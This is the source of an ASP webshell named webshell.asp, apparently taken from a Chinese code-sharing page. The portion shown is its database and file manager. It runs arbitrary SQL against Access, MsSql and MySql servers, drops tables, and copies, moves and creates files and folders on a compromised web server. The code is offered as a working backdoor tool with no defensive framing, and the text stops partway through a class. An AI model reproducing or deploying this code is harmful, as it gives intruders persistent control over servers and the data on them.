📄 webshell.asp
字号:
Function CreateMdb(Path)
SI="<br><br>"
Set C = CreateObject(ObT(2,0))
C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
Set C = Nothing
If Err.number=0 Then
SI = SI & Path & "建立成功!"
End If
SI=SI&BackUrl
Response.Write SI
End function
Function CompactMdb(Path)
If Not ObT(0,1) Then
Set C=CreateObject(ObT(3,0))
C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
Set C=Nothing
Else
Set FSO=CreateObject(ObT(0,1))
If FSO.FileExists(Path) Then
Set C=CreateObject(ObT(3,0))
C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
Set C=Nothing
FSO.DeleteFile Path
FSO.MoveFile Path&"_bak",Path
Else
SI="<center><br><br><br>数据库"&Path&"没有发现!</center>"
Err.number=1
End If
Set FSO=Nothing
End If
If Err.number=0 Then
SI="<center><br><br><br>数据库"&Path&"压缩成功!</center>"
End If
SI=SI&BackUrl
Response.Write SI
End Function
Function DbManager()
SqlStr=Trim(Request.Form("SqlStr"))
DbStr=Request.Form("DbStr")
SI=SI&"<table width='100%' border='0' cellspacing='0' cellpadding='0'>"
SI=SI&"<form name='DbForm' method='post' action=''>"
SI=SI&"<tr><td width='100' height='27'> 数据库连接串:</td>"
SI=SI&"<td><input name='DbStr' style='width:100%' value="""&DbStr&"""></td>"
SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>连接串示例</option><option value=0>Access连接</option>"
SI=SI&"<option value=1>MsSql连接</option><option value=2>MySql连接</option><option value=3>DSN连接</option>"
SI=SI&"<option value=-1>--SQL语法--</option><option value=4>显示数据</option><option value=5>添加数据</option>"
SI=SI&"<option value=6>删除数据</option><option value=7>修改数据</option><option value=8>建数据表</option>"
SI=SI&"<option value=9>删数据表</option><option value=10>添加字段</option><option value=11>删除字段</option>"
SI=SI&"<option value=12>完全显示</option></select></td></tr>"
SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
SI=SI&"<tr><td height='30'> SQL操作命令:</td>"
SI=SI&"<td><input name='SqlStr' style='width:100%' value="""&SqlStr&"""></td>"
SI=SI&"<td align='center'><input type='submit' name='Submit' value='执行' onclick='return DbCheck()'></td>"
SI=SI&"</tr></form></table><span id='abc'></span>"
Response.Write SI:SI=""
If Len(DbStr)>40 Then
Set Conn=CreateObject(ObT(5,0))
Conn.Open DbStr
Set Rs=Conn.OpenSchema(20)
SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>表<br>名</td>"
Rs.MoveFirst
Do While Not Rs.Eof
If Rs("TABLE_TYPE")="TABLE" then
TName=Rs("TABLE_NAME")
SI=SI&"<td align=center><a href='javascript:FullSqlStr(""DROP TABLE ["&TName&"]"",1)'>[ del ]</a><br>"
SI=SI&"<a href='javascript:FullSqlStr(""SELECT * FROM ["&TName&"]"",1)'>"&TName&"</a></td>"
End If
Rs.MoveNext
Loop
Set Rs=Nothing
SI=SI&"</tr></table>"
Response.Write SI:SI=""
If Len(SqlStr)>10 Then
If LCase(Left(SqlStr,6))="select" then
SI=SI&"执行语句:"&SqlStr
Set Rs=CreateObject("Adodb.Recordset")
Rs.open SqlStr,Conn,1,1
FN=Rs.Fields.Count
RC=Rs.RecordCount
Rs.PageSize=20
Count=Rs.PageSize
PN=Rs.PageCount
Page=request("Page")
If Page<>"" Then Page=Clng(Page)
If Page="" Or Page=0 Then Page=1
If Page>PN Then Page=PN
If Page>1 Then Rs.absolutepage=Page
SI=SI&"<table><tr height=25 bgcolor=#cccccc><td></td>"
For n=0 to FN-1
Set Fld=Rs.Fields.Item(n)
SI=SI&"<td align='center'>"&Fld.Name&"</td>"
Set Fld=nothing
Next
SI=SI&"</tr>"
Do While Not(Rs.Eof or Rs.Bof) And Count>0
Count=Count-1
Bgcolor="#EFEFEF"
SI=SI&"<tr><td bgcolor=#cccccc><font face='wingdings'>x</font></td>"
For i=0 To FN-1
If Bgcolor="#EFEFEF" Then:Bgcolor="#F5F5F5":Else:Bgcolor="#EFEFEF":End if
If RC=1 Then
ColInfo=HTMLEncode(Rs(i))
Else
ColInfo=HTMLEncode(Left(Rs(i),50))
End If
SI=SI&"<td bgcolor="&Bgcolor&">"&ColInfo&"</td>"
Next
SI=SI&"</tr>"
Rs.MoveNext
Loop
Response.Write SI:SI=""
SqlStr=HtmlEnCode(SqlStr)
SI=SI&"<tr><td colspan="&FN+1&" align=center>记录数:"&RC&" 页码:"&Page&"/"&PN
If PN>1 Then
SI=SI&" <a href='javascript:FullSqlStr("""&SqlStr&""",1)'>首页</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&Page-1&")'>上一页</a> "
If Page>8 Then:Sp=Page-8:Else:Sp=1:End if
For i=Sp To Sp+8
If i>PN Then Exit For
If i=Page Then
SI=SI&i&" "
Else
SI=SI&"<a href='javascript:FullSqlStr("""&SqlStr&""","&i&")'>"&i&"</a> "
End If
Next
SI=SI&" <a href='javascript:FullSqlStr("""&SqlStr&""","&Page+1&")'>下一页</a> <a href='javascript:FullSqlStr("""&SqlStr&""","&PN&")'>尾页</a>"
End If
SI=SI&"<hr color='#EFEFEF'></td></tr></table>"
Rs.Close:Set Rs=Nothing
Response.Write SI:SI=""
Else
Conn.Execute(SqlStr)
SI=SI&"SQL语句:"&SqlStr
End If
Response.Write SI:SI=""
End If
Conn.Close
Set Conn=Nothing
End If
End Function
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=ApplicationName&" - "&ServerIP%></title>
<style type="text/css">
<!--
body,td {font-size: 12px;}
input,select{font-size: 12px;background-color:#FFFFFF;}
.tr {background-color:#EFEFEF;}
.cmd {background-color:#000000;color:#FFFFFF}
body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;
<%If Action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}
a {color: black;text-decoration: none;}
.am {color: #003366;font-size: 11px;}
-->
</style>
<script language="javascript">
<!--
function yesok(){
if (confirm("确认要执行此操作吗?"))
return true;
else
return false;
}
function ShowFolder(Folder){
top.addrform.FolderPath.value = Folder;
top.addrform.submit();
}
function FullForm(FName,FAction){
top.hideform.FName.value = FName;
if(FAction=="CopyFile"){
DName = prompt("请输入复制到目标文件全名称",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="MoveFile"){
DName = prompt("请输入移动到目标文件全名称",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="CopyFolder"){
DName = prompt("请输入移动到目标文件夹全名称",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="MoveFolder"){
DName = prompt("请输入移动到目标文件夹全名称",FName);
top.hideform.FName.value += "||||"+DName;
}else if(FAction=="NewFolder"){
DName = prompt("请输入要新建的文件夹全名称",FName);
top.hideform.FName.value = DName;
}else if(FAction=="CreateMdb"){
DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);
top.hideform.FName.value = DName;
}else if(FAction=="CompactMdb"){
DName = prompt("请输入要压缩的Mdb文件全名称,注意文件是否存在!",FName);
top.hideform.FName.value = DName;
}else{
DName = "Other";
}
if(DName!=null){
top.hideform.Action.value = FAction;
top.hideform.submit();
}else{
top.hideform.FName.value = "";
}
}
function DbCheck(){
if(DbForm.DbStr.value == ""){
alert("请先连接数据库");
FullDbStr(0);
return false;
}
return true;
}
function FullDbStr(i){
if(i<0){
return false;
}
Str = new Array(12);
Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=<%=RePath(Session("FolderPath"))%>\\db.mdb;Jet OLEDB:Database Password=***";
Str[1] = "Driver={Sql Server};Server=<%=ServerIP%>,1433;Database=DbName;Uid=sa;Pwd=****";
Str[2] = "Driver={MySql};Server=<%=ServerIP%>;Port=3306;Database=DbName;Uid=root;Pwd=****";
Str[3] = "Dsn=DsnName";
Str[4] = "SELECT * FROM [TableName] WHERE ID<100";
Str[5] = "INSERT INTO [TableName](USER,PASS) VALUES(\'gxgl_com\',\'mypass\')";
Str[6] = "DELETE FROM [TableName] WHERE ID=100";
Str[7] = "UPDATE [TableName] SET USER=\'gxgl_com\' WHERE ID=100";
Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
Str[9] = "DROP TABLE [TableName]";
Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";
Str[12]= "当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。";
if(i<=3){
DbForm.DbStr.value = Str[i];
DbForm.SqlStr.value = "";
abc.innerHTML="<center>请确认己连接数据库再输入SQL操作命令语句。</center>";
}else if(i==12){
alert(Str[i]);
}else{
DbForm.SqlStr.value = Str[i];
}
return true;
}
function FullSqlStr(str,pg){
if(DbForm.DbStr.value.length<5){
alert("请检查数据库连接串是否正确!")
return false;
}
if(str.length<10){
alert("请检查SQL语句是否正确!")
return false;
}
DbForm.SqlStr.value = str ;
DbForm.Page.value = pg;
abc.innerHTML="";
DbForm.submit();
return true;
}
-->
</script>
</head>
<body>
<%
Dim T1
Class UPC
Dim D1,D2
Public Function Form(F)
F=lcase(F)
If D1.exists(F) then:Form=D1(F):else:Form="":end if
End Function
Public Function UA(F)
F=lcase(F)
If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -